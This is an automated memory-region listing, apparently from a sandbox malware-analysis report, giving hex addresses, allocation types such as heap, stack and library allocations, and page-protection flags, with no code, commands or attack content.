page read and write
4D6B000
trusted library allocation
page read and write
410B000
heap
page read and write
4AF2000
trusted library allocation
page read and write
4E76000
trusted library allocation
page read and write
4BA4000
trusted library allocation
page read and write
4C49000
trusted library allocation
page read and write
25653560000
heap
page read and write
4F22000
trusted library allocation
page read and write
6FBAD000
unkown
page read and write
806B000
trusted library allocation
page read and write
4DCF000
trusted library allocation
page read and write
537000
heap
page read and write
4DF3000
trusted library allocation
page read and write
5D19000
heap
page read and write
4BDE000
trusted library allocation
page read and write
4B16000
trusted library allocation
page read and write
5D3D000
heap
page read and write
25E80850000
heap
page read and write
40A0000
trusted library allocation
page read and write
25653760000
heap
page read and write
8EF0000
trusted library allocation
page execute and read and write
5E60000
trusted library allocation
page read and write
4CFE000
trusted library allocation
page read and write
D24000
trusted library allocation
page read and write
2089CE6B000
heap
page read and write
4D76000
trusted library allocation
page read and write
4A8C000
trusted library allocation
page read and write
4D64000
trusted library allocation
page read and write
60E000
stack
page read and write
8BD0000
heap
page read and write
24E2000
trusted library allocation
page read and write
4B16000
trusted library allocation
page read and write
675D000
stack
page read and write
A90000
trusted library allocation
page read and write
4B6F000
trusted library allocation
page read and write
8260000
trusted library allocation
page read and write
4700000
trusted library allocation
page read and write
4D5D000
trusted library allocation
page read and write
4F25000
trusted library allocation
page read and write
4A8E000
trusted library allocation
page read and write
620000
heap
page read and write
4A88000
trusted library allocation
page read and write
B20000
trusted library allocation
page read and write
4BA1000
trusted library allocation
page read and write
418E000
stack
page read and write
4AE6000
trusted library allocation
page read and write
4B33000
trusted library allocation
page read and write
5510000
trusted library allocation
page read and write
2C9C000
trusted library allocation
page read and write
4B87000
trusted library allocation
page read and write
65B0000
trusted library allocation
page execute and read and write
6BCE000
stack
page read and write
4A16000
trusted library allocation
page read and write
4698000
trusted library allocation
page read and write
4D40000
heap
page read and write
4A67000
trusted library allocation
page read and write
4E85000
trusted library allocation
page read and write
22526A20000
heap
page read and write
6A30000
trusted library allocation
page execute and read and write
5500000
trusted library allocation
page read and write
4B91000
trusted library allocation
page read and write
752000
heap
page read and write
8290000
trusted library allocation
page read and write
4EB5000
trusted library allocation
page read and write
4AC6000
trusted library allocation
page read and write
4F6C000
trusted library allocation
page read and write
4A6D000
trusted library allocation
page read and write
4CD2000
trusted library allocation
page read and write
4D55000
trusted library allocation
page read and write
8140000
heap
page read and write
4DF1000
trusted library allocation
page read and write
7A80000
trusted library allocation
page read and write
4B48000
trusted library allocation
page read and write
4C6D000
trusted library allocation
page read and write
4F00000
trusted library allocation
page read and write
4F40000
trusted library allocation
page read and write
7B60000
trusted library allocation
page read and write
25653550000
heap
page read and write
4B76000
trusted library allocation
page read and write
4DDE000
trusted library allocation
page read and write
4B68000
trusted library allocation
page read and write
4CB9000
trusted library allocation
page read and write
4EF5000
trusted library allocation
page read and write
4D49000
trusted library allocation
page read and write
4CD2000
trusted library allocation
page read and write
4D25000
trusted library allocation
page read and write
4EBF000
trusted library allocation
page read and write
5BAB000
stack
page read and write
D30000
trusted library allocation
page read and write
B60000
trusted library allocation
page read and write
6FB90000
unkown
page readonly
4EED000
trusted library allocation
page read and write
4BC9000
trusted library allocation
page read and write
4EEB000
trusted library allocation
page read and write
4092000
trusted library allocation
page read and write
26F4000
trusted library allocation
page read and write
2CAF000
trusted library allocation
page read and write
6A30000
heap
page read and write
5C1D000
stack
page read and write
5679000
trusted library allocation
page read and write
2565359A000
heap
page read and write
667E000
stack
page read and write
5CE0000
heap
page read and write
5523000
trusted library allocation
page read and write
4A84000
trusted library allocation
page read and write
49FF000
trusted library allocation
page read and write
148C000
stack
page read and write
A9E000
stack
page read and write
4BB0000
heap
page read and write
530000
heap
page read and write
4F50000
trusted library allocation
page read and write
4FC5000
trusted library allocation
page read and write
7B50000
trusted library allocation
page read and write
4D3A000
trusted library allocation
page read and write
63FE000
stack
page read and write
4B76000
trusted library allocation
page read and write
460E000
stack
page read and write
4E40000
trusted library allocation
page read and write
610000
heap
page read and write
4C5D000
trusted library allocation
page read and write
4F66000
trusted library allocation
page read and write
BBD000
heap
page read and write
4CAE000
trusted library allocation
page read and write
4EA9000
trusted library allocation
page read and write
C10000
trusted library allocation
page read and write
8270000
trusted library allocation
page read and write
4C51000
trusted library allocation
page read and write
4AF8000
trusted library allocation
page read and write
6EF0000
trusted library allocation
page execute and read and write
229C73D0000
heap
page read and write
4E1D000
trusted library allocation
page read and write
4B80000
trusted library allocation
page read and write
7AED000
stack
page read and write
B32000
trusted library allocation
page read and write
4B61000
trusted library allocation
page read and write
4AB2000
trusted library allocation
page read and write
4D36000
trusted library allocation
page read and write
7FBD0000
trusted library allocation
page execute and read and write
8BF5000
heap
page read and write
4DE0000
trusted library allocation
page read and write
4FBD000
trusted library allocation
page read and write
70A0000
trusted library allocation
page read and write
4A2D000
trusted library allocation
page read and write
4BE0000
trusted library allocation
page read and write
4DB2000
trusted library allocation
page read and write
451E000
stack
page read and write
4D57000
trusted library allocation
page read and write
4BF9000
trusted library allocation
page read and write
6C1E000
stack
page read and write
79A000
heap
page read and write
4090000
trusted library allocation
page read and write
CB1000
unkown
page read and write
2CBD000
trusted library allocation
page read and write
4C16000
trusted library allocation
page read and write
4B50000
trusted library allocation
page read and write
460F000
stack
page read and write
4FA4000
trusted library allocation
page read and write
B40000
trusted library allocation
page read and write
4BAC000
trusted library allocation
page read and write
6F80000
trusted library allocation
page read and write
4D14000
trusted library allocation
page read and write
4D0B000
trusted library allocation
page read and write
5FD0000
trusted library allocation
page execute and read and write
4A5F000
trusted library allocation
page read and write
40A5000
trusted library allocation
page execute and read and write
6FE000
heap
page read and write
80E000
stack
page read and write
52AD000
stack
page read and write
24E7000
trusted library allocation
page execute and read and write
4F2A000
trusted library allocation
page read and write
89E000
stack
page read and write
7B70000
trusted library allocation
page read and write
4BB5000
trusted library allocation
page read and write
4F7C000
trusted library allocation
page read and write
4E18000
trusted library allocation
page read and write
4B87000
trusted library allocation
page read and write
6E70000
trusted library allocation
page read and write
268E000
stack
page read and write
4EAF000
trusted library allocation
page read and write
7BF0000
heap
page read and write
7A56000
stack
page read and write
25E806B1000
heap
page read and write
5DE000
stack
page read and write
4F26000
trusted library allocation
page read and write
4AF4000
trusted library allocation
page read and write
4E5D000
trusted library allocation
page read and write
4CA8000
trusted library allocation
page read and write
4D43000
heap
page read and write
7B40000
trusted library allocation
page execute and read and write
ADB41FE000
stack
page read and write
4AF7000
trusted library allocation
page read and write
4ACF000
trusted library allocation
page read and write
4F72000
trusted library allocation
page read and write
65FD000
stack
page read and write
67DE000
stack
page read and write
4D92000
heap
page read and write
699B000
stack
page read and write
4EAA000
trusted library allocation
page read and write
6290000
heap
page read and write
C1D000
trusted library allocation
page execute and read and write
4BDA000
trusted library allocation
page read and write
5D78000
heap
page read and write
AF0000
trusted library section
page read and write
6CA000
heap
page read and write
7BE0000
trusted library allocation
page read and write
4AFD000
trusted library allocation
page read and write
4D21000
trusted library allocation
page read and write
4C0A000
trusted library allocation
page read and write
4C59000
trusted library allocation
page read and write
158D000
stack
page read and write
6F8D000
stack
page read and write
6366000
trusted library allocation
page read and write
4B35000
trusted library allocation
page read and write
4FCC000
stack
page read and write
4D29000
trusted library allocation
page read and write
5EFE000
stack
page read and write
2500000
trusted library allocation
page read and write
4BC5000
trusted library allocation
page read and write
6C0000
heap
page read and write
7B50000
trusted library allocation
page read and write
4ED4000
trusted library allocation
page read and write
E91997E000
stack
page read and write
4A5A000
trusted library allocation
page read and write
BCB000
heap
page read and write
4DFF000
trusted library allocation
page read and write
6DCF000
heap
page read and write
4F38000
trusted library allocation
page read and write
7BEE000
trusted library allocation
page read and write
4DEA000
heap
page read and write
4FBF000
trusted library allocation
page read and write
4D15000
trusted library allocation
page read and write
8080000
trusted library allocation
page read and write
4EEB000
trusted library allocation
page read and write
8C1F000
heap
page read and write
621D000
stack
page read and write
4AB4000
trusted library allocation
page read and write
4E43000
trusted library allocation
page read and write
70CC000
stack
page read and write
689E000
stack
page read and write
4F44000
trusted library allocation
page read and write
4FAF000
trusted library allocation
page read and write
4D5B000
trusted library allocation
page read and write
59AE000
stack
page read and write
4B7A000
trusted library allocation
page read and write
4EEF000
trusted library allocation
page read and write
4CA0000
trusted library allocation
page read and write
4AD7000
trusted library allocation
page read and write
4DA4000
trusted library allocation
page read and write
580000
heap
page read and write
4D87000
trusted library allocation
page read and write
4DC1000
trusted library allocation
page read and write
4B38000
trusted library allocation
page read and write
4EA2000
trusted library allocation
page read and write
6F40000
trusted library allocation
page read and write
1410000
trusted library allocation
page execute and read and write
4A73000
trusted library allocation
page read and write
4DCB000
trusted library allocation
page read and write
4E8D000
trusted library allocation
page read and write
4F98000
trusted library allocation
page read and write
7FD10000
trusted library allocation
page execute and read and write
70D0000
trusted library allocation
page read and write
4AAA000
trusted library allocation
page read and write
4C60000
trusted library allocation
page read and write
3691000
trusted library allocation
page read and write
4E7A000
trusted library allocation
page read and write
4D2D000
trusted library allocation
page read and write
7B60000
trusted library allocation
page read and write
409A000
trusted library allocation
page execute and read and write
6C9F000
stack
page read and write
25E80650000
heap
page read and write
4D00000
trusted library allocation
page read and write
4A91000
trusted library allocation
page read and write
15C2000
trusted library allocation
page read and write
C6B000
heap
page read and write
26FF000
trusted library allocation
page read and write
82A0000
heap
page execute and read and write
4A6F000
trusted library allocation
page read and write
4B05000
trusted library allocation
page read and write
70C0000
trusted library allocation
page read and write
4F74000
trusted library allocation
page read and write
4FB3000
trusted library allocation
page read and write
4EBB000
trusted library allocation
page read and write
B42000
trusted library allocation
page read and write
4D61000
trusted library allocation
page read and write
4AD1000
trusted library allocation
page read and write
CA1000
unkown
page execute read
2089CC27000
heap
page read and write
4BAE000
trusted library allocation
page read and write
CA0000
unkown
page readonly
6E13000
heap
page read and write
4D68000
heap
page read and write
4BB0000
trusted library allocation
page read and write
6FA0000
trusted library allocation
page read and write
4CFA000
trusted library allocation
page read and write
8F11000
trusted library allocation
page read and write
4FAC000
trusted library allocation
page read and write
6DC2000
heap
page read and write
4B44000
trusted library allocation
page read and write
25653590000
heap
page read and write
44DE000
stack
page read and write
4C9E000
trusted library allocation
page read and write
15F4000
trusted library allocation
page read and write
4EC3000
trusted library allocation
page read and write
4ECE000
trusted library allocation
page read and write
4F42000
trusted library allocation
page read and write
4040000
trusted library section
page read and write
6D31000
heap
page read and write
4DFD000
trusted library allocation
page read and write
229C7774000
heap
page read and write
70B0000
trusted library allocation
page read and write
64EF000
trusted library allocation
page read and write
4B5F000
trusted library allocation
page read and write
67BE000
stack
page read and write
8A7000
heap
page read and write
1720000
trusted library allocation
page read and write
4ED6000
trusted library allocation
page read and write
4DC3000
heap
page read and write
7DE6000
heap
page read and write
7DEC000
heap
page read and write
B29000
trusted library allocation
page read and write
7C20000
trusted library allocation
page execute and read and write
4A49000
trusted library allocation
page read and write
229C7560000
heap
page read and write
8280000
trusted library allocation
page read and write
AA0000
heap
page read and write
4CA4000
trusted library allocation
page read and write
671E000
stack
page read and write
4D51000
trusted library allocation
page read and write
4DA6000
trusted library allocation
page read and write
6F10000
trusted library allocation
page read and write
4AF6000
trusted library allocation
page read and write
C0E000
stack
page read and write
56A9000
trusted library allocation
page read and write
4F91000
trusted library allocation
page read and write
4E53000
trusted library allocation
page read and write
DD0000
heap
page read and write
4E9E000
trusted library allocation
page read and write
4ACD000
trusted library allocation
page read and write
7A70000
trusted library allocation
page read and write
6D45000
heap
page read and write
81A0000
trusted library allocation
page execute and read and write
4B20000
trusted library allocation
page read and write
7140000
trusted library allocation
page read and write
1600000
trusted library allocation
page read and write
4A42000
trusted library allocation
page read and write
2CC9000
trusted library allocation
page read and write
4D3B000
trusted library allocation
page read and write
C67000
heap
page read and write
D80000
heap
page execute and read and write
A41000
unkown
page write copy
4BC7000
trusted library allocation
page read and write
62B000
heap
page read and write
456E000
stack
page read and write
57F000
stack
page read and write
4080000
trusted library allocation
page read and write
703000
heap
page read and write
4EF3000
trusted library allocation
page read and write
4F4C000
trusted library allocation
page read and write
67AD000
stack
page read and write
229C74B0000
heap
page read and write
4B48000
trusted library allocation
page read and write
4EBD000
trusted library allocation
page read and write
408D000
trusted library allocation
page execute and read and write
4A69000
trusted library allocation
page read and write
4C76000
trusted library allocation
page read and write
5E80000
trusted library allocation
page read and write
4B82000
trusted library allocation
page read and write
414E000
stack
page read and write
4AF5000
trusted library allocation
page read and write
4EAC000
trusted library allocation
page read and write
4D5F000
trusted library allocation
page read and write
22526B18000
heap
page read and write
5D16000
heap
page read and write
4C68000
trusted library allocation
page read and write
4ED2000
trusted library allocation
page read and write
6F4E000
stack
page read and write
8B70000
trusted library allocation
page execute and read and write
229C756C000
heap
page read and write
4B4D000
trusted library allocation
page read and write
6D41000
heap
page read and write
4DE5000
trusted library allocation
page read and write
4DAA000
trusted library allocation
page read and write
2089E6B0000
heap
page read and write
4A65000
trusted library allocation
page read and write
8C70000
trusted library allocation
page execute and read and write
4D85000
trusted library allocation
page read and write
4F0C000
trusted library allocation
page read and write
4B3A000
trusted library allocation
page read and write
6C22000
heap
page read and write
7C10000
heap
page read and write
6F00000
trusted library allocation
page read and write
610000
trusted library section
page read and write
5E84000
trusted library allocation
page read and write
4BA3000
trusted library allocation
page read and write
4A82000
trusted library allocation
page read and write
8B90000
trusted library section
page read and write
E9198FF000
stack
page read and write
4F49000
trusted library allocation
page read and write
4D10000
trusted library allocation
page read and write
8300000
trusted library allocation
page read and write
4B2B000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
88E0000
trusted library section
page read and write
4DAE000
trusted library allocation
page read and write
4DB5000
trusted library allocation
page read and write
4C8D000
trusted library allocation
page read and write
4C57000
trusted library allocation
page read and write
4570000
trusted library allocation
page read and write
66CE000
stack
page read and write
6220000
trusted library allocation
page read and write
4B19000
trusted library allocation
page read and write
4CAA000
trusted library allocation
page read and write
22526C10000
heap
page read and write
685D000
stack
page read and write
B75000
heap
page read and write
2C4C000
trusted library allocation
page read and write
4DC5000
trusted library allocation
page read and write
2560000
trusted library allocation
page execute and read and write
4B08000
trusted library allocation
page read and write
7B26000
stack
page read and write
6F39000
trusted library allocation
page read and write
C1A000
trusted library allocation
page read and write
7A7000
heap
page read and write
49F5000
trusted library allocation
page read and write
4AFB000
trusted library allocation
page read and write
15D1000
trusted library allocation
page read and write
A7F000
stack
page read and write
4AAE000
trusted library allocation
page read and write
4CF2000
trusted library allocation
page read and write
4F24000
trusted library allocation
page read and write
8310000
trusted library allocation
page read and write
4ECC000
trusted library allocation
page read and write
4D00000
trusted library allocation
page read and write
627D000
stack
page read and write
A30000
unkown
page readonly
4D17000
trusted library allocation
page read and write
5070000
heap
page execute and read and write
526E000
stack
page read and write
136E000
stack
page read and write
4F47000
trusted library allocation
page read and write
4F0A000
trusted library allocation
page read and write
B81000
heap
page read and write
4C00000
trusted library allocation
page read and write
4E29000
trusted library allocation
page read and write
4DED000
trusted library allocation
page read and write
69E000
stack
page read and write
527C000
stack
page read and write
4CED000
trusted library allocation
page read and write
24D0000
trusted library allocation
page read and write
45C000
stack
page read and write
4CC0000
trusted library allocation
page read and write
6DD0000
heap
page read and write
AA0000
heap
page read and write
4B84000
trusted library allocation
page read and write
66DE000
stack
page read and write
8190000
trusted library allocation
page execute and read and write
65E000
stack
page read and write
4B59000
trusted library allocation
page read and write
B70000
heap
page readonly
4CE6000
trusted library allocation
page read and write
60BE000
stack
page read and write
7100000
trusted library allocation
page read and write
6E03000
heap
page read and write
4DF5000
trusted library allocation
page read and write
79D000
heap
page read and write
D55000
trusted library allocation
page execute and read and write
8AA0000
trusted library allocation
page execute and read and write
4BA6000
trusted library allocation
page read and write
4CBF000
trusted library allocation
page read and write
49D000
stack
page read and write
7FFB1E875000
unkown
page readonly
A50000
heap
page read and write
4F08000
trusted library allocation
page read and write
2CD8000
trusted library allocation
page read and write
4B89000
trusted library allocation
page read and write
229C7582000
heap
page read and write
4D53000
trusted library allocation
page read and write
611F000
stack
page read and write
4D0D000
trusted library allocation
page read and write
8B90000
trusted library allocation
page execute and read and write
6920000
heap
page read and write
15BE000
trusted library allocation
page read and write
5E9000
heap
page read and write
4A31000
trusted library allocation
page read and write
49FB000
trusted library allocation
page read and write
4BB2000
trusted library allocation
page read and write
57F6000
trusted library allocation
page read and write
6A1B000
stack
page read and write
C30000
trusted library allocation
page execute and read and write
6C5E000
stack
page read and write
4CAC000
trusted library allocation
page read and write
6F20000
trusted library allocation
page read and write
455E000
stack
page read and write
4630000
trusted library allocation
page read and write
22526B10000
heap
page read and write
4B27000
trusted library allocation
page read and write
4EB9000
trusted library allocation
page read and write
3CA7000
trusted library allocation
page read and write
4B44000
trusted library allocation
page read and write
807C000
trusted library allocation
page read and write
4AE7000
trusted library allocation
page read and write
4C7A000
trusted library allocation
page read and write
5CEC000
heap
page read and write
7150000
trusted library allocation
page read and write
6E60000
trusted library allocation
page read and write
4AD9000
trusted library allocation
page read and write
4BF3000
trusted library allocation
page read and write
4A63000
trusted library allocation
page read and write
7C90000
trusted library allocation
page read and write
5848000
trusted library allocation
page read and write
607F000
stack
page read and write
6E69000
trusted library allocation
page read and write
B80000
heap
page read and write
4F68000
trusted library allocation
page read and write
6E4D000
heap
page read and write
8060000
trusted library allocation
page read and write
7FBF0000
trusted library allocation
page execute and read and write
7B82000
trusted library allocation
page read and write
AAA000
heap
page read and write
BCE000
stack
page read and write
C20000
heap
page read and write
5080000
heap
page read and write
7C75000
trusted library allocation
page read and write
4E87000
trusted library allocation
page read and write
6E5F000
heap
page read and write
410000
heap
page read and write
7A60000
trusted library allocation
page execute and read and write
4074000
trusted library allocation
page read and write
4AA7000
trusted library allocation
page read and write
4AF0000
trusted library allocation
page read and write
4E6E000
trusted library allocation
page read and write
4FA0000
trusted library allocation
page read and write
4B7E000
trusted library allocation
page read and write
8240000
trusted library allocation
page read and write
5D5E000
stack
page read and write
4100000
heap
page read and write
643E000
stack
page read and write
4CFC000
trusted library allocation
page read and write
4EFC000
trusted library allocation
page read and write
4DAC000
trusted library allocation
page read and write
7DE0000
heap
page read and write
4D47000
trusted library allocation
page read and write
633E000
stack
page read and write
B223AFE000
stack
page read and write
7FB60000
trusted library allocation
page execute and read and write
2701000
trusted library allocation
page read and write
4C14000
trusted library allocation
page read and write
522E000
stack
page read and write
4B8D000
trusted library allocation
page read and write
A31000
unkown
page execute read
C60000
heap
page read and write
2691000
trusted library allocation
page read and write
88F267F000
stack
page read and write
4D1F000
trusted library allocation
page read and write
4BA0000
trusted library allocation
page read and write
4A12000
trusted library allocation
page read and write
6D0000
heap
page read and write
6D10000
heap
page read and write
6E41000
heap
page read and write
4FAA000
trusted library allocation
page read and write
4D0A000
trusted library allocation
page read and write
46A1000
trusted library allocation
page read and write
4AB6000
trusted library allocation
page read and write
15F0000
trusted library allocation
page read and write
4DE2000
trusted library allocation
page read and write
4D3E000
trusted library allocation
page read and write
25E8069C000
heap
page read and write
5CEE000
heap
page read and write
ADB4AFB000
stack
page read and write
4D0E000
trusted library allocation
page read and write
229C7770000
heap
page read and write
4ABE000
trusted library allocation
page read and write
8180000
trusted library allocation
page execute and read and write
8090000
trusted library allocation
page read and write
4EBC000
trusted library allocation
page read and write
24E5000
trusted library allocation
page execute and read and write
4BC3000
trusted library allocation
page read and write
4DA8000
trusted library allocation
page read and write
820000
heap
page read and write
566E000
trusted library allocation
page read and write
AD5000
heap
page read and write
4B31000
trusted library allocation
page read and write
2089CB90000
heap
page read and write
C00000
trusted library allocation
page read and write
4DE7000
heap
page read and write
4D49000
trusted library allocation
page read and write
4C90000
trusted library allocation
page read and write
4AD5000
trusted library allocation
page read and write
8030000
trusted library allocation
page read and write
B8C000
heap
page read and write
4ED8000
trusted library allocation
page read and write
C37000
heap
page read and write
4ECC000
trusted library allocation
page read and write
6F02000
trusted library allocation
page read and write
25E80670000
heap
page read and write
4F4D000
trusted library allocation
page read and write
4D40000
trusted library allocation
page read and write
4BC7000
trusted library allocation
page read and write
7070000
trusted library allocation
page read and write
5E70000
trusted library allocation
page read and write
4EAE000
trusted library allocation
page read and write
7FFE000
stack
page read and write
6FBA6000
unkown
page readonly
7B80000
trusted library allocation
page read and write
4D02000
trusted library allocation
page read and write
15B0000
trusted library allocation
page read and write
A10000
heap
page read and write
4DBB000
trusted library allocation
page read and write
6B8E000
stack
page read and write
7B2E000
stack
page read and write
4EF1000
trusted library allocation
page read and write
4B78000
trusted library allocation
page read and write
464E000
stack
page read and write
4AE0000
trusted library allocation
page read and write
CB2000
unkown
page readonly
704E000
stack
page read and write
6F0E000
stack
page read and write
4CF2000
trusted library allocation
page read and write
6A0000
heap
page read and write
4BC9000
trusted library allocation
page read and write
4CA2000
trusted library allocation
page read and write
70F0000
trusted library allocation
page read and write
1440000
heap
page read and write
4A2F000
trusted library allocation
page read and write
15CE000
trusted library allocation
page read and write
8A80000
trusted library allocation
page execute and read and write
4F9A000
trusted library allocation
page read and write
82F0000
trusted library allocation
page read and write
BC1000
heap
page read and write
6850000
heap
page execute and read and write
C40000
trusted library allocation
page read and write
6360000
trusted library allocation
page read and write
ADB42FE000
stack
page read and write
6FD0000
trusted library allocation
page read and write
4DB0000
trusted library allocation
page read and write
4D47000
trusted library allocation
page read and write
CB1000
unkown
page write copy
4F3C000
trusted library allocation
page read and write
4B0C000
trusted library allocation
page read and write
56A1000
trusted library allocation
page read and write
24DA000
trusted library allocation
page execute and read and write
4AF9000
trusted library allocation
page read and write
54BD000
stack
page read and write
B28000
heap
page read and write
D46000
trusted library allocation
page execute and read and write
7EF0000
trusted library allocation
page execute and read and write
3C41000
trusted library allocation
page read and write
24D6000
trusted library allocation
page execute and read and write
B2D000
trusted library allocation
page execute and read and write
497000
stack
page read and write
A41000
unkown
page read and write
67FE000
stack
page read and write
4A62000
trusted library allocation
page read and write
4D55000
trusted library allocation
page read and write
7FBE000
stack
page read and write
4640000
heap
page execute and read and write
80B0000
trusted library allocation
page read and write
7BEA000
trusted library allocation
page read and write
6A5E000
stack
page read and write
ADB44FE000
stack
page read and write
80A0000
trusted library allocation
page read and write
4EC1000
trusted library allocation
page read and write
4D59000
trusted library allocation
page read and write
407D000
trusted library allocation
page execute and read and write
B44000
heap
page read and write
4C98000
trusted library allocation
page read and write
40E8000
trusted library allocation
page read and write
5E9D000
trusted library allocation
page read and write
4190000
trusted library allocation
page execute and read and write
4D79000
trusted library allocation
page read and write
4FA2000
trusted library allocation
page read and write
A94000
unkown
page readonly
4D3C000
trusted library allocation
page read and write
6E10000
trusted library allocation
page read and write
4AB0000
trusted library allocation
page read and write
3C69000
trusted library allocation
page read and write
4D4F000
trusted library allocation
page read and write
40C0000
trusted library allocation
page read and write
5FE0000
trusted library allocation
page read and write
4A55000
trusted library allocation
page read and write
4F06000
trusted library allocation
page read and write
4F17000
trusted library allocation
page read and write
There are 1283 hidden memdumps, click here to show them.